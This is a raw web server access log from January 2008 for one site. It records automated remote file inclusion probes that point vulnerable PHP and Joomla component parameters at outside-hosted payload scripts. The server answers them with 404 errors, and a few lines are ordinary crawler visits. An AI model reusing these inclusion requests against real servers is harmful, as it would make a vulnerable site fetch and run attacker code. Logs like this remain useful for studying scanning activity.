64.38.19.90 - - [25/Jan/2008:09:45:05 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [25/Jan/2008:09:45:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:46:25 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:46:25 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:09:46:32 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:09:46:33 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:46:34 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:46:35 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:09:46:46 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:09:46:46 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:09:46:46 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:09:46:46 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:09:46:47 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:09:46:57 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:09:46:57 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:09:46:57 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:09:46:58 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:47:04 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:47:04 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:47:04 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:09:47:04 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:09:47:16 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.110 - - [25/Jan/2008:09:48:51 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [25/Jan/2008:09:48:52 -0800] "GET /logs/access.log HTTP/1.0" 200 280935 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.130.100 - - [25/Jan/2008:09:49:18 -0800] "GET /logs/admin/header.php?loc=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
207.44.130.100 - - [25/Jan/2008:09:49:31 -0800] "GET /admin/header.php?loc=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.79.163.220 - - [25/Jan/2008:09:50:08 -0800] "GET /logs/access.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=www.geocities.com/paddy.only/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Jan/2008:09:50:08 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=www.geocities.com/paddy.only/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Jan/2008:09:50:08 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=www.geocities.com/paddy.only/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:51:03 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:51:03 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:51:04 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:09:51:05 -0800] "GET /logs/access_071225.log/index.php?body=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.114.21 - - [25/Jan/2008:09:51:07 -0800] "GET //components/com_extcalendar/admin_events.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [25/Jan/2008:09:51:11 -0800] "GET /logs//components/com_extcalendar/admin_events.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [25/Jan/2008:09:51:13 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:09:51:21 -0800] "GET /index.php?body=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:09:51:27 -0800] "GET /logs/index.php?body=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:53:08 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:53:09 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:53:09 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:53:09 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:53:09 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:53:10 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.114.21 - - [25/Jan/2008:09:53:11 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:55:05 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:55:05 -0800] "GET //login.php?dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:55:09 -0800] "GET /logs//login.php?dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.123 - - [25/Jan/2008:09:55:48 -0800] "GET /megumi/Bracelet/ HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:09:58:25 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:09:58:25 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:09:58:25 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:09:58:25 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:02:11 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:02:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:02:12 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
56.0.103.25 - - [25/Jan/2008:10:03:39 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.google.com/search?q=presto+studio&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
56.0.103.25 - - [25/Jan/2008:10:03:40 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:10:07:14 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:09:55 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:09:55 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:09:55 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:09:55 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.30.216.103 - - [25/Jan/2008:10:11:04 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:10:11:29 -0800] "GET /errors.php?error=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:10:11:29 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:10:11:32 -0800] "GET /errors.php?error=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:10:11:32 -0800] "GET /logs/errors.php?error=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:10:11:32 -0800] "GET /logs/errors.php?error=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:10:11:40 -0800] "GET /logs/errors.php?error=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:10:11:40 -0800] "GET /logs/errors.php?error=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:10:11:50 -0800] "GET /errors.php?error=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:11:50 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:10:11:50 -0800] "GET /errors.php?error=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:11:50 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:11:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.150.12 - - [25/Jan/2008:10:12:29 -0800] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [25/Jan/2008:10:12:30 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [25/Jan/2008:10:12:30 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:13:28 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:13:28 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:13:28 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:13:42 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:14:37 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:10:15:59 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:10:16:14 -0800] "GET //errors.php?error=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:10:16:37 -0800] "GET /tmp/sess_5216bb6b89ed803d92d38eefc7c30ced HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:10:20:25 -0800] "GET /logs/access_080101.log/components/com_forum/download.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:10:20:25 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:10:20:25 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:10:23:21 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:10:25:13 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.179.153 - - [25/Jan/2008:10:25:24 -0800] "GET /logs/access_071221.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.179.153 - - [25/Jan/2008:10:25:25 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.179.153 - - [25/Jan/2008:10:25:25 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.179.153 - - [25/Jan/2008:10:25:43 -0800] "GET /logs/access_071224.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:10:26:09 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:26:26 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:26:26 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:26:29 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:10:26:29 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:26:30 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:26:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:26:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
